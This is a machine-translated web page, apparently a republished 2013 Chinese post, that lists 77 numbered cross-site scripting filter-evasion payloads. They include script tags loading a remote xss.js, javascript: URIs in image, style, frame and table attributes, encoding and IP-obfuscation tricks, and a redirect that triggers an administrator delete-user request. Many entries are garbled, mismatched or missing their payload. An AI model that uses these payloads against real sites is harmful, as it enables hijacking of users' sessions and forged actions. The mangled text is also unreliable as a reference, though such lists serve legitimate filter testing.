77 anger and 77 XSS Cases

Last Update:2013-11-20 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

I saw a summary of an XSS from a website. It was actually an image version. What's the use? I am dizzy. I flipped through the original post. The one above T00Ls is also reproduced, the source cannot be found. You are welcome to claim it.

(1) Common XSS JavaScript injection
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>

(2) IMG Tag XSS use JavaScript commands
<Script src = http://2cto.com/XSS/xss.js> </SCRIPT>

(3) IMG labels without semicolons and without quotation marks

(4) the IMG label is case insensitive.

(5) HTML encoding (a semicolon is required)

(6) modify the defect IMG label
<SCRIPT> alert ("XSS") </SCRIPT> ">

(7) formCharCode tag (calculator)

(8) Unicode encoding of UTF-8 (calculator)

(9) Unicode encoding of 7-bit UTF-8 is not semicolon (calculator)

(10) There is no semicolon (calculator) in hexadecimal encoding)

(11) embedded tags that separate Javascript

(12) embedded encoding labels that separate Javascript

(13) embedded line breaks

(14) embedded carriage return

(15) embedded multi-line JavaScript injection, an extreme XSS example

(16) solve the restricted characters (the same page is required)
<Script> z = 'document. '</script>
<Script> z = z + 'write (''</script>
<Script> z = z + '<script' </script>
<Script> z = z + 'src = ht '</script>
<Script> z = z + 'tp: // ww '</script>
<Script> z = z + 'W. shell' </script>
<Script> z = z + '. net/1.' </script>
<Script> z = z + 'js> </SC '</script>
<Script> z = z + 'ript> ") '</script>
<Script> eval_r (z) </script>

(17) null characters
Perl-e 'print " out

(18) null character 2, null character is basically ineffective in China, because there is no place to use
Perl-e 'print '<SCR \ 0ip> alert (\ "XSS \") </SCR \ 0ept> ";'> out

(19) The IMG tag before Spaces and meta

(20) Non-alpha-non-digit XSS
<SCRIPT/xss src = "http://2cto.com/XSS/xss.js”> </SCRIPT>

(21) Non-alpha-non-digit XSS to 2
<BODY onload! # $ % &()*~ + -_.,:;? @ [/| \] ^ '= Alert ("XSS")>

(22) Non-alpha-non-digit XSS to 3
<SCRIPT/SRC = "http://2cto.com/XSS/xss.js”> </SCRIPT>

(23) Double parentheses
<SCRIPT> alert ("XSS"); // </SCRIPT>

(24) No End Script mark (only Firefox and other browsers)
<Script src = http://2cto.com/XSS/xss.js? <B>

(25) No End Script flag 2
<Script src = // 2cto.com/XSS/xss.js>

(26) half-open HTML/JavaScript XSS

(27) double angle brackets
<Iframe src = http://2cto.com/XSS.html <

(28) double quotation marks and semicolons without single quotation marks
<SCRIPT> a =/XSS/
Alert (a. source) </SCRIPT>

(29) JavaScript code-Based Filtering
\ "; Alert ('xss ');//

(30) End the Title tag
</TITLE> <SCRIPT> alert ("XSS"); </SCRIPT>

(31) Input Image
<Input src = "javascript: alert ('xss');">

(32) BODY Image
<Body background = "javascript: alert ('xss')">

(33) BODY Tag
<BODY ('xss')>

(34) IMG Dynsrc

(35) IMG Lowsrc

(36) BGSOUND
<Bgsound src = "javascript: alert ('xss');">

(37) STYLE sheet
<Link rel = "stylesheet" HREF = "javascript: alert ('xsss');">

(38) Remote Style Sheets
<Link rel = "stylesheet" HREF = "http://2cto.com/xss.css”>

(39) List-style-image (style)
<STYLE> li {list-style-image: url ("javascript: alert ('xss')") ;}</STYLE> <UL> <LI> XSS

(40) IMG VBscript
</STYLE> <UL> <LI> XSS

(41) META url
<META HTTP-EQUIV = "refresh" CONTENT = "0;
URL = http: //; URL = javascript: alert ('xss'); ">

(42) Iframe
<Iframe src = "javascript: alert ('xss');"> </IFRAME>

(43) Frame
<FRAMESET> <frame src = "javascript: alert ('xsss');"> </FRAMESET>

(44) Table
<Table background = "javascript: alert ('xss')">

(45) TD
<TABLE> <td background = "javascript: alert ('xsss')">

(46) DIV background-image
<Div style = "background-image: url (javascript: alert ('xsss')">

(47) add additional characters (1-32 & 34 & 39 & 160 & 8192-) after DIV background-image-
(8 & 13 & 12288 & 65279)
<Div style = "background-image: url (javascript: alert ('xsss')">

(48) DIV expression
<Div style = "width: expression_r (alert ('xsss');">

(49) expression of STYLE attribute splitting

(50) Anonymous STYLE (Composition: opening angle and starting with a letter)
<Xss style = "xss: expression_r (alert ('xsss')">

(51) STYLE background-image
<STYLE>. XSS {background-image: url ("javascript: alert ('xsss')") ;}</STYLE> <
CLASS = XSS> </A>

(52) IMG STYLE
Exppression (alert ("XSS") '>

(53) STYLE background
<STYLE> <STYLE
Type = "text/css"> BODY {background: url ("javascript: alert ('xsss')")} </STYLE>

(54) BASE
<Base href = "javascript: alert ('xss'); //">

(55) EMBED tag, which can be embedded into FLASH, contains XSS
<Embed src = "http://2cto.com/XSS/xss.swf”> </EMBED>

(56) Use ActionScrpt in flash to mix your XSS code
A = "get ";
B = "URL (\"";
C = "javascript :";
D = "alert ('xss ');\")";
Eval_r (a + B + c + d );

(57) The XML namespace. HTC file must be on the same server as your XSS carrier.
<HTML xmlns: xss>
<? Import namespace = "xss" implementation = "http://2cto.com/XSS/xss.htc”>
<Xss: xss> XSS </xss: xss>
</HTML>

(58) If your JS is filtered out, you can add JS Code to the image to use it.
<Script src = ""> </SCRIPT>

(59) IMG embedded command, which can execute any command

(601_imginsert command (a.jpg on the same server)
Redirect 302/a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Escape symbol Filtering
<SCRIPT a = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>

(62)
<SCRIPT = ">" SRC = "http://2cto.com/xss.js"> </SCRIPT>

(63)
<SCRIPT a = ">" "SRC =" http://2cto.com/xss.js"> </SCRIPT>

(64)
<SCRIPT "a = '>'" SRC = "http://2cto.com/xss.js"> </SCRIPT>

(65)
<SCRIPT a = '> 'src = "http://2cto.com/xss.js”> </SCRIPT>

(66)
<SCRIPT a = "> '>" SRC = "http://2cto.com/xss.js"> </SCRIPT>

(67)
<SCRIPT> document. write ("<SCRI"); </SCRIPT> pt src = "http://2cto.com/xss.js”>
</SCRIPT>

(68) URL Bypass
<A href = "http: // 127.0.0.1/"> XSS </A>

(69) URL Encoding
<A href = "http://2cto.com"> XSS </A>

(70) IP decimal
<A href = "http: // 3232235521"> XSS </A>

(71) IP hexadecimal
<A href = "http: // 0xc0. 0xa8. 0 × 00. 0 × 01"> XSS </A>

(72) IP address gossip
<A href = "http: // 030020.250.0000.0001"> XSS </A>

(73) Mixed Encoding
<A href = "h
Tt p: // 6 6.000146.0 × 7. 147/"> XSS </A>

(74) Saving [http:]
<A href = "// www.2cto.com/"> XSS </A>

(75) Saving [www]
<A href = "http://2cto.com/"> XSS </A>

(76) Absolute DNS
<A href = "http://www.bkjia.com./"> XSS </A>

(77) javascript Link
<A href = "javascript: document. location = 'HTTP: // www.bkjia.com/'"> XSS </A>

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

77 anger and 77 XSS Cases

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support

77 anger and 77 XSS Cases

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

Trending Topic

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support